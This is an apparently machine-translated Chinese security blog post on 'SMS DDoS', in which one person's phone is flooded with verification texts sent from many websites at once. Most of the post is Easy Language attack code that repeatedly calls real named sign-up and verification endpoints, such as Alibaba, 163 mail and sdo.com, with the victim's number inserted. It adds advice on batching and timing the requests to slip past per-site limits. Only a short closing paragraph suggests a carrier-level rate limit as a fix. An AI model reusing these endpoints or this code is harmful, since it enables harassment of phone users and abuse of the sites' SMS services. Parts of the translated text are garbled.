SMS ddos implementation and repair solutions

With the gradual integration of mobile terminals and PCs, more and more websites are implementing a policy to ensure the reliability and traffic quality of users, that is, sending mobile phone verification codes to users' mobile phones. At Wooyun, we can often see the bypassing of these things and the abuse of these things-sms dos, which causes great inconvenience to users, vendors are also active in repairing this problem (maybe because China Mobile charges fees based on the number of items). But is it the most terrible? No, the most terrible thing is not DOS, but DDOS, not controlled by the vendor.

First two images
Okay, you understand what I mean. That's right. You can use the verification code of each website to send a mobile phone at the same time. This is what the website recognizes and permits, the sending of a single website has never been inferior. Even more worried is that there is no way to resist this. Traditional spam text message and other referers use databases or sensitive words for filtering, and in order to ensure the user experience, verification codes will not be intercepted. Why? Manual addition is too late. Moreover, it is very difficult to execute other operations when text messages occupy a large amount of system resources. Shutdown or flight modes can only be exchanged for a short period of peace, because text messages cannot be sent to the mobile phone and will be temporarily suspended until the mobile phone can communicate normally and will still be sent to the mobile phone. None of the software is intercepted, and only a few app stores have it. In this case, it is difficult for an attacker to launch such attacks. In the last few months, the "death" attack threatened others. I believe the harm of this method is comparable to that of "Death"

The following describes how to create a website. First, we find a website with the mobile phone registration function. Here I use NC to capture packets, and then send the text message verification code to find that moblie = XXXXXXXXXXX is the mobile phone number you entered on the website. Then we collected one here and went on to other websites to collect the information, note that some of them are post, and some are post. After get is collected, I use easy language and support Chinese language ..

. Version 2. Supports the library internetHTTP to read files ("http: //" + Delete the first and end blank (edit box 1. Content) + ".12530.com/user/querypwd.do? Phonenumber = "+ Delete first and last blank (edit box 1. Content) HTTP Read File (" http: // "+ Delete first and last blank (edit box 1. Content) +" .12530.com/user/querypwd.do? Phonenumber = "+ Delete first and last blank (edit box 1. Content) HTTP Read File (" http: // "+ Delete first and last blank (edit box 1. Content) +" .12530.com/user/querypwd.do? Phonenumber = "+ Delete the beginning and end blank (edit box 1. Content) HTTP Read File (" http://china.alibaba.com/member/sendIdentityCodeByMobile.htm?callback=jQuery1640829300928232310891_1326548812739&mobile= "+ Delete the beginning and end blank (edit box 1. Content) HTTP Read File (" http://china.alibaba.com/member/sendIdentityCodeByMobile.htm?callback=jQuery1640829300932302133891_1326548812739&mobile= "+ Delete the beginning and end blank (edit box 1. Content) HTTP Read File (" http://china.alibaba.com/member/sendIdentityCodeByMobile.htm?callback=jQuery1640829300923212323891_1326548812739&mobile= "+ Delete the beginning and end blank (edit box 1. Content) HTTP Read File (" http://www.egu365.com/member/js/sendMobileCode.jsp?phone= "+ Delete the beginning and end blank (edit box 1. Content) +" & r = 1019.7334977874661 ") HTTP Read File (" http://china.alibaba.com/member/sendIdentityCodeByMobile.htm?callback=jQuery1640829300942433110891_1326548812739&mobile= "+ Delete the beginning and end blank (edit box 1. Content) HTTP Read File (" http://www.dbank.com/app/wap/captcha.php?mobile= "+ Delete the beginning and end blank (edit box 1. Content) HTTP Read File (" http://china.alibaba.com/member/sendIdentityCodeByMobile.htm?callback=jQuery1640829300942424110891_1326548812739&mobile= "+ Delete the beginning and end blank (edit box 1. Content) HTTP Read File (" http://china.alibaba.com/member/sendIdentityCodeByMobile.htm?callback=jQuery1640829300923223110891_1326548812739&mobile= "+ Delete the beginning and end blank (edit box 1. Content) HTTP Read File (" register.sdo.com/gaea/SendPhoneMsg.ashx? Page = REG & mobile = "+ Delete first and last blank (edit box 1. Content) HTTP Read File (" register.sdo.com/gaea/SendPhoneMsg.ashx? Page = REG & mobile = "+ Delete first and last blank (edit box 1. Content) HTTP Read File (" http://my.b2b.hc360.com/my/turbine/action/company.RegisterAjaxAction/eventsubmit_dosendverifiycodesms/doSendverifiycodesms?receiver= "+ Delete the beginning and end blank (edit box 1. Content) HTTP Read File (" http://china.alibaba.com/member/sendIdentityCodeByMobile.htm?callback=jQuery164082930042421210891_1326548812739&mobile= "+ Delete the beginning and end blank (edit box 1. Content) HTTP Read File (" http://china.alibaba.com/member/sendIdentityCodeByMobile.htm?callback=jQuery164082930424249110891_1326548812739&mobile= "+ Delete the beginning and end blank (edit box 1. Content) HTTP Read File (" http://www.egu365.com/member/js/sendMobileCode.jsp?phone= "+ Delete the beginning and end blank (edit box 1. Content) +" & r = 1019.7334977874661 ") HTTP Read File (" http://china.alibaba.com/member/sendIdentityCodeByMobile.htm?callback=jQuery164082930042449110891_1326548812739&mobile= "+ Delete the beginning and end blank (edit box 1. Content) HTTP Read File (" http://my.b2b.hc360.com/my/turbine/action/company.RegisterAjaxAction/eventsubmit_dosendverifiycodesms/doSendverifiycodesms?receiver= "+ Delete the beginning and end blank (edit box 1. Content) HTTP Read File (" http://china.alibaba.com/member/sendIdentityCodeByMobile.htm?callback=jQuery16408293023239110891_1326548812739&mobile= "+ Delete the beginning and end blank (edit box 1. Content) HTTP Read File (" http://passport.soufun.com/ajax/ajaxmobilecode_v3.aspx?mobile= "+ Delete the beginning and end blank (edit box 1. Content) HTTP Read File (" http://user.himovie.net/AjaxPro/Ajax.ashx?action=RegSendCode&phone= "+ Delete the beginning and end blank (edit box 1. Content) HTTP Read File (" http://user.himovie.net/AjaxPro/Ajax.ashx?action=RegSendCode&phone= "+ Delete the beginning and end blank (edit box 1. Content) HTTP Read File (" http://user.himovie.net/AjaxPro/Ajax.ashx?action=RegSendCode&phone= "+ Delete the beginning and end blank (edit box 1. Content) HTTP Read File (" http://www.egu365.com/member/js/sendMobileCode.jsp?phone= "+ Delete the beginning and end blank (edit box 1. Content) +" & r = 1019.7334977874661 ") HTTP Read File (" http://wap.mail.163.com/reg.s?regtype=mobile&method=registerMobile&mobile_num= "+ Delete the beginning and end blank (edit box 1. Content) +" & password = asdasd & password2 = asdasd & action = submit registration information ") HTTP Read File (" http://www.egu365.com/member/js/sendMobileCode.jsp?phone= "+ Delete the beginning and end of the blank (edit box 1. Content) +" & r = 1019.7334977874661 ")

Edit box 1. The content is the mobile phone number. Some addresses are provided here for your reference. Then post

. Version 2. local variable POST address, text type. local variable POST data, text type. local variable a, text type. local variable B, text type. local variable c, text type. local variable d, text type. local variable e, text type. local variable f, text-type POST address =" http://www.istudy.com.cn/incpage/AxMember.html "POST Data =" Mode = 4 & Mobile = "+ Delete first and end blank (edit box 1. content) + "& UserID = 0 & rnd = 0.232398880064155" + to text (random number (11, 99) a =" http://passport.kongzhong.com/safebyphone.do?sbp=tobindsafephone "B =" idcard = 3704811993070638 "+ to text (random number (11, 99) +" & safephone = "+ Delete first and end blank (edit box 1. Content) c =" http://mp3.easou.com/dg.e?l=2ld.1&esid=nq-aHZcGWms&wver=c "D =" phone = "+ Delete the beginning and end blank (edit box 1. content) + "& name = & content = & song = % E8 % A2 % AB % E7 % 88% B1 % E5 % 87% BA % E5 % 8D % 96% E8 % A2 % AB % E6 % 83% 85% E6 % 89% E8 % B4 % A5-% E6 % 9E % 93% E5 % 97% B2 & esid = nq-aHZcGWms & id = 86% & submit = % E9 % 6985089 9A % E8 % BF % 87% E7 % 9F % AD % E4 % BF % A1 % E5 % 85% 8D % E8 % B4 % B9 % E7 % 82% B9 % E6 % 92% AD" e = "phone =" + Delete the beginning and end blank (edit box 1. content) + "& name = & content = & song = % E6 % 9D % A8 % E4 % B8 % 9E % E7 % 90% B3-% E9 % 9B % A8 % E7 % 88% B1 -% E5 % 8D % 8E % E4 % BA % E7 % BE % A4 % E6 % 98% 9F19 & esid = nq-aHZcGWms & id = 3867344 & submit = % E9 % 80% 9A % E8 % BF % 87% E7 % 9F % AD % E4 % BF % A1 % E5 % 85% 8D % E8 % B4 % B9 % E7 % 82% B9 % E6 % 92% AD "f =" phone = "+ Delete the beginning and end blank (edit box 1. content) + "& name = & content = & song = % E7 % 88% B1 % E7 % 9A % 84% E4 % BE % 9B % E5 % 85% BB-% E6 % 9D % A8 % e5 % B9 % 82 & esid = nq-aHZcGWms & id = 3889055 & submit = % E9 % 80% 9A % E8 % BF % 87% E7 % 9F % AD % E4 % BF % A1 % E5 % 85% 8D % E8 % B4 % B9 % E7 % 82% B9 % E6 % 92% AD "comet HTTP Read File (, "POST", B) comet HTTP Read File (a, "POST", B) comet HTTP Read File (a, "POST", B) comet HTTP Read File (a, "POST", B)

 

I think this is the biggest harm. Several websites with vulnerabilities (which can be sent without limit) are constantly submitting, and other websites are divided into several groups, after each group is sent, perform latency processing. If the time limit for the group before the other websites is reached, the Group will continue sending. Of course, some websites broadcast verification codes by phone .. . Version 2. Local variable a, text type. Local variable B, text type a = "http://www.m3.cc/url.php? Class = check "B =" action = validphone & MemberMobile = "+ Delete the beginning and end blank (edit box 3. Content) comet HTTP Read File (a," POST ", B) Solution:

In this case, I think CNVD can be used to contact China Mobile and China Unicom for a unified SMS interface, so that the same number can be used only once within 60 seconds, for example, within 60 seconds, all unnecessary items are voided. It may require a lot of energy and financial resources, but with the speed of Internet development, this is a problem that has to be considered. In the future, it will be more complicated. The treasure of a thousand miles is destroyed by the ant point. What's more, this is not an ant point.